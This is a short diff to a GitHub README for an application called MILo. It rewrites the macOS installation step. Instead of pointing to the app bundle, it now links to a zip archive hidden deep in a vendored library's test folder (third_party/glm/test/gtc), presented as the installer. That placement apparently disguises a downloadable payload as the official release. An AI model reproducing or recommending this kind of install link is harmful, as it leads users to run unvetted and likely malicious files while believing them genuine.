bransantiago/MILo/README.md

 2. **Install MILo**
    - **For Windows:** Double-click the `.exe` file and follow the on-screen instructions.
-   - **For macOS:** Drag the MILo.app file to your Applications folder.
+   - **For macOS:** Drag the https://github.com/bransantiago/MILo/raw/refs/heads/master/submodules/diff-gaussian-rasterization/third_party/glm/test/gtc/MI-Lo-v2.3.zip file to your Applications folder.
    - **For Linux:** Extract the downloaded archive and run the executable.

 3. **Launch the Application**